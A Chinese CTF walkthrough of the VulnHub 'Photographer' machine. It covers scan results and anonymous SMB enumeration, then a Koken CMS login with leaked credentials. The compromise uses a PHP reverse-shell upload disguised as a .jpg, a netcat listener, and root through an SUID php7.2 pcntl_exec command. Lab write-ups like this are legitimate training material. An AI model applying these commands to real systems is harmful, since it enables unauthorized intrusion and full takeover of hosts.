vulnhub系列靶机-Photographer

靶机地址:++https://download.vulnhub.com/photographer/Photographer.ova++

端口目录

80/tcp open http

139/tcp open netbios-ssn

445/tcp open microsoft-ds

8000/tcp open http-alt

80端口

01:42:17 200 - 466B - /assets/

01:42:23 200 - 564B - /images/

8000端口

01:45:36 200 - 515B - /admin/

01:45:36 200 - 515B - /admin/index.html

01:45:41 200 - 109B - /app/

01:45:41 200 - 109B - /app/cache/

01:45:41 200 - 109B - /app/logs/

01:45:46 200 - 1KB - /content/

01:45:47 200 - 1KB - /error/

每个访问页面都很卡,而且也没有说明有用信息,我是不知道怎么做了,那换一个思路

卡住后利用139和445端口

139和445端口是SMB服务端,可以轻松实现samba共享。通常在boot2root中,可以尝试空会话,看看有没有什么信息。现在将使用smbclient来查找无需认证就可以访问的共享。下面的命令是用来查找共享的:(或者使用文件管理器连接查看文件smb://192.168.113.138/sambashare/)

smbclient --N --L \\\\192.168.113.143

smbclient \\\\192.168.113.143\\sambashare

get mailsent.txt

get wordpress.bkp.zip

打开mailsent.txt文件,看有什么有用的信息:

还是有些重要信息的。得到了两个用户名Agi和Daisa。Agi说了一些秘密,可能是与密码有关的线索,保存下来为以后使用。

浏览80端口页面,结果没什么可以利用的点。所以浏览另一个端口8000。

在8000页面发现服务器应该运行的是Koken CMS,查看源码发现版本是koken 0.22.24

msf里面找不到

于是通过Google搜索个公开漏洞: https://www.exploit-db.com/exploits/48706

漏洞利用

读了下这个漏洞的描述,是一个文件上传漏洞,不过需要先登录到后台,于是浏览CMS的admin页面,页面需要输入凭证。

http://192.168.113.143:8000/admin/

使用之前获取的mailsent.tt文件中的信息,daisa@photographer.com和密码babygirl,试一下是否可行。

daisa@photographer.com

babygirl

Yes!登录进去了!

这里有文件上传的点,来试试看

左边的Content就对应网站页面上的Content

上传kali自带的反弹shell.php,但是这里是白名单,那就用bp改后罪名

cp /usr/share/webshells/php/php-reverse-shell.php ./php-reverse-shell.php.jpg

修改这里

上传后,打开终端nc -lvnp 1234进行监听,然后通过浏览器访问页面,没多久便反弹回shell了。

进入home目录,有user.txt文件,查看其为flag:

完整 tty 升级

python2 -c 'import pty;pty.spawn("/bin/bash")'

权限提升

现在开始进行提权操作,先查看suid二进制文件权限,到tmp目录下执行命令:

find / -perm -u=s -type f 2>/dev/null

如上图。php7.2是被设置了suid权限,于是利用php7.2来进行提权,输入命令:

/usr/bin/php7.2 -r "pcntl_exec('/bin/bash', '-p');"

如下图所示,输入命令后,即提权成功,

进入root目录下,查看flag文件

相关推荐
爱浦路 IPLOOK1 小时前
矿山无人化作业5G专网方案:企业专网核心网络选型分析
网络·分布式·科技·5g·信息与通信
制冷技术咨询与服务1 小时前
某纯电牵引车的CAN网络3
网络·某纯电牵引车的can网络2
驭渊的小故事2 小时前
网络原理04(http协议详细解析3)(2000详细解析HTTPS的工作原理)
网络·网络协议·http
额额额对了3 小时前
Linux 进程间通信(IPC)核心机制:消息队列、共享内存与信号量详解
linux·网络·网络协议
myy-learn4 小时前
31-TCP并发
服务器·网络·tcp/ip
程序员夏洛4 小时前
HTTP 请求包含哪些内容,请求头和请求体有哪些类型?
网络·网络协议·http
啊阿狸不会拉杆4 小时前
《计算机网络-自顶向下方法》3.9 小结 · 课后习题 · Wireshark实验
网络·测试工具·wireshark
Chengbei114 小时前
SRC报告成稿 Skill(SRC/0day 提交稿、分层验证门、Step 式 PoC、截图铁律)
网络·人工智能·安全·web安全·自动化·系统安全
小雪崩4 小时前
嵌入式学习 day39:TCP并发服务器模型
linux·服务器·c语言·网络·学习·tcp/ip